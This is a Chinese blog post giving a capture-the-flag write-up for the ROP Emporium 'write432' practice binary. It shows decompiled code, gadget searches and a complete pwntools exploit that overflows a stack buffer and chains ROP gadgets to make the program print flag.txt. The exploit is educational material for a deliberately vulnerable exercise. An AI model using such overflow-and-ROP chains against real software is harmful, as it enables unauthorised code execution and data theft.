ROP Emporium-write432 wp

于 2022-03-24 21:22:41 发布
阅读量355 收藏
点赞数
分类专栏: pwn 文章标签: pwn write432
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/devil8123665/article/details/123721945
版权

write432 wp

wp:

ROPEmporium-WriteUp - ios's blog

ROP Emporium一系列题_Gzero__的博客-CSDN博客

在以上的wp中,在usefulFunction函数中使用的是system函数,但是我拿到的题目中,在该函数中是print_file 函数,如下:

int usefulFunction()
{
  return print_file("nonexistent");
}

所以只能自己一步一步测试。

write4 challenge的提示中,提到了需要使用print_file函数读取flag.txt文件。

1 将write432文件放入IDA中,追踪main-pwnme函数,函数具体实现看不到,将libwrite432.so放入IDA中,分析pwnme函数:

int pwnme()
{
  char s[36]; // [esp+0h] [ebp-28h] BYREF
​
  setvbuf(stdout, 0, 2, 0);
  puts("write4 by ROP Emporium");
  puts("x86\n");
  memset(s, 0, 0x20u);
  puts("Go ahead and give me the input already!\n");
  printf("> ");
  read(0, s, 0x200u);
  return puts("Thank you!");
}

在该函数中的read处存在栈溢出。print_file函数如下:

int __cdecl print_file(char *filename)
{
  char s[33]; // [esp+Bh] [ebp-2Dh] BYREF
  FILE *stream; // [esp+2Ch] [ebp-Ch]
​
  stream = fopen(filename, "r");
  if ( !stream )
  {
    printf("Failed to open file: %s\n", filename);
    exit(1);
  }
  fgets(s, 33, stream);
  puts(s);
  return fclose(stream);
}
​

2 通过分析,基本思路

(1)通过read函数溢出到print_file函数执行。

(2)修改print_file函数的filename参数为字符串“flag.txt”的地址

(3)将“flag.txt”字符串写入可写区域,写入.data段。

(4).data段写入数据,需要找到ROP链,写入“flag.txt“八个字符需要分两次写入

 

3 获取print——file函数地址

# objdump -d write432 -M intel | grep "print_file"
 8048395:       e8 46 00 00 00          call   80483e0 <print_file@plt+0x10>
080483d0 <print_file@plt>:
 8048538:       e8 93 fe ff ff          call   80483d0 <print_file@plt>
​
print_file_addr=0x080483D0

4 测试调用print_file函数

test:
# python2 -c "print 'a'*44+'\xd0\x83\x04\x08'" | ./write432 
write4 by ROP Emporium
x86
​
Go ahead and give me the input already!
​
> Thank you!
Failed to open file:

经过测试,返回“Failed to open file: ”,证实思路没有问题。

5 查看可写区域

# readelf -S write432 | grep data
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [16] .rodata           PROGBITS        080485c8 0005c8 000014 00   A  0   0  4
  [24] .data             PROGBITS        0804a018 001018 000008 00  WA  0   0  4
  data_addr=0x804a018

.data段可以写入数据,长度为8.

6查找ROP链。

需要data_addr出栈、“flag”出栈,ret。,需要pop;pop;ret

需要将“flag”写入data_addr,需要 mov,ret

# ROPgadget --binary write432 --only "mov|pop|ret"
Gadgets information
============================================================
0x08048543 : mov dword ptr [edi], ebp ; ret
0x080485aa : pop edi ; pop ebp ; ret
​
pop_edi_ebp=0x080485aa
mov_edi_ebp=0x08048543

7 exp

 

如果不足四个字节可以使用“\00”不齐一个字节

###python3
from pwn import *
p = process('./write432')
e = ELF('./write432')
print_file=0x080483D0
data_addr=0x0804a018
pop_edi_ebp=0x080485aa
mov_edi_ebp=0x08048543
​
write_flag=p32(pop_edi_ebp)+p32(data_addr)+b"flag"+p32(mov_edi_ebp)+p32(pop_edi_ebp)+p32(data_addr+4)+b".txt"+p32(mov_edi_ebp)
​
​
payload=b'A'*44 +write_flag+ p32(print_file )+p32(0x0)+p32(data_addr)
​
p.recvuntil('>')
p.sendline(payload)
p.interactive()
​
​

devil8123665
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
rop-emporium:新型Rop Emporium 2020回收箱的解决方案
02-14
ROP Emporium 2020年2020年7月更新的新 32位和64位bin的解决方案/编写。
ROP_Emporium_write4
Starr
03-24 790
文章目录1. write432信息收集黑盒测试反汇编思路Exp2. write4反汇编PayloadExp3. 参考文章 1. write432 信息收集 题目给了3个文件:write432, libwrite432.so, flag.txt。 $ file write432 write432: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.
ROP Emporium write4
u014377094的博客
02-10 2373
checksec还是老样子 ida打开 依旧是pwnme函数,点开是个plt跳转 文件给了.so,那么ida打开 明显栈溢出 继续找可利用的漏洞,注意看notice,提示打开printfile 我们可以看到这里传参是个指针,下面fopen后fgets接着puts了,fopen是拿来开文件的,文件里不正是flag,这次倒是让system休息了一回。 现在我们要做的就是让al指向写有文件名的地址。现在难点在如何在一块区域写下文件名,并且知道这块地址是多少。栈想来想去也不知道怎么做,但.
x86 架构中的内存攻击技术 ROP(二)
个人笔记
04-12 885
ROP 返回导向编程作为一种高级的内存攻击技术,可以让代码执行程序中已有二进制代码片段,将若干指令拼接在一起,形成 ROP 链。上一章讲述了其一般用法,本次继续讲述 ROP emporium 剩余的题目。
rop emporium 2020】write4
^_^
02-06 431
这篇博客主要是关于rop emporium(2020年7月的版本)的ret2win这道题的学习记录 因为网上都是比较早版本的题解,所以写了这篇博客,这道题与之前的版本的区别是没有system函数,但是有另外一个print_file函数来获取flag,所以本质上还是差不多的。 题目链接:https://ropemporium.com/challenge/split.html 备注:以下题目都是在ubuntu16.04下完成 32位 溢出点还是44… 看了下网上给的教程是利用system函数。但是好像网站更.
小白详解rop emporium
BadRer的博客
08-02 2079
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 题目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
Rompmporium漏洞:ROP Emporium漏洞
02-15
ROP Emporium开发 该存储库包含针对ROP Emporium挑战的漏洞利用程序。
rop-master.rar
11-04
RopRop 是 Rapid Open PlatformRapid Open Platform Rapid Open Platform Rapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open PlatformRapid Open Platform Rapid Open PlatformRapid Open ...
adobe-rop-webapp
05-25
school_adobe 更改照片: #### main.js在main.js ,需要更改两个数组: att_arr和IMAGES 。 att_arr保留为每张照片显示的字幕-摄影师的名字后应带有© 如果可以的话,接下来可以是一年。 例如: "Photographer...
Rop-Fast:快速跳动
06-25
Rop-Fast本项目为了解决一个快速搭建一个Rest风格的服务而产生。基于Rop框架,进行一些扩展,修复一些bug。Rop-Fast
记一次CTF过程(Writeup)
热门推荐
_Ralph的博客
01-17 4万+
前言在i春秋平台看到几个ctf练习题,就点进去看看吧,能做就做不能做说明水平有限,还要继续加油(革命尚未成功,同志仍需努力)O(∩_∩)O哈哈~第一题:Robot题目名称:Robot有没有觉得这个题目很熟悉?没错robots.txt!很熟悉。可能解题思路就和robots.txt有关了。访问链接,网页显示位一张机器人的图片,没什么信息,网页源代码同样没有什么具有价值的信息。那我们就抓个包看看吧,用b
ROPEmporium通关全解(一)
Yale的博客
12-24 981
前言 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战题目的背景 来自ROPEmporium 旨在通...
node-v9.6.0-x86.msi
04-29
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
Python基于机器学习的分布式系统故障诊断系统源代码,分布式系统的故障数据进行分析,设计故障诊断模型,高效地分析并识别故障类别
04-29
基于技术手段(包括但不限于机器学习、深度学习等技术)对分布式系统的故障数据进行分析,设计故障诊断模型,高效地分析并识别故障类别,实现分布式系统故障运维的智能化,快速恢复故障的同时大大降低分布式系统运维工作的难度,减少运维对人力资源的消耗。在分布式系统中某个节点发生故障时,故障会沿着分布式系统的拓扑结构进行传播,造成自身节点及其邻接节点相关的KPI指标和发生大量日志异常
JavaScript前端开发的核心语言前端开发的核心语言
最新发布
04-29
javascript 当今互联网时代,JavaScript已经成为了前端开发的核心语言它是一种高级程序设计语言,通常用于网页的交互和动态效果的实现。JavaScript的灵活性以及广泛的使用使得它变得异常重要,能够为用户带来更好的用户体验。 JavaScript的特点之一是它的轻量级,它可以在网页中运行无需单独的编译或下载。这意味着网页可以更快地加载并且用户无需安装额外的软件才能运行网页上的JavaScript代码。此外,与HTML和CSS紧密结合,可以直接在HTML文档中嵌入,使得网页的开发变得非常便捷。 JavaScript具有动态性,它可以在浏览器中实时修改页面内容和样。它可以通过操作DOM(文档对象模型来动态地修改网页的结构和布局,并且可以根据用户的行为实时地响应各种事件,如点击、标悬停、滚动等。这使得开发者可以轻松地为网页添加交互性和动态效果,提供更好的用户体验。 JavaScript也是一种面向对象的语言。它支持对象、类、继承、多态等面向对象编程的概念,使得代码结构更加清晰和可维护。开发者可以创建自定义的对象和方法,对功能进行封装和复用,提高代码的可读性和可维护性。
四则运算自动生成程序安装包
04-29
四则运算自动生成程序安装包
基于Linux的私有文件服务器(网盘).zip
04-29
基于Linux的私有文件服务器(网盘)
源代码-access 管理 系统 API 文件.zip
04-29
源代码-access 管理 系统 API 文件.zip
海康机器人智能读码器工业协议操作手册V1.0.2.pdf
04-29
海康机器人智能读码器工业协议操作手册V1.0.2.pdf
pwnyools ROP模块
08-25
ROP (Return-Oriented Programming) 是一种利用现有程序中已存在的代码片段来构造恶意代码执行的技术。pwnyools 是一个 Python 库,它提供了一些用于创建和利用 ROP 载荷的工具。 pwnyools 的 ROP 模块包含了一些...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值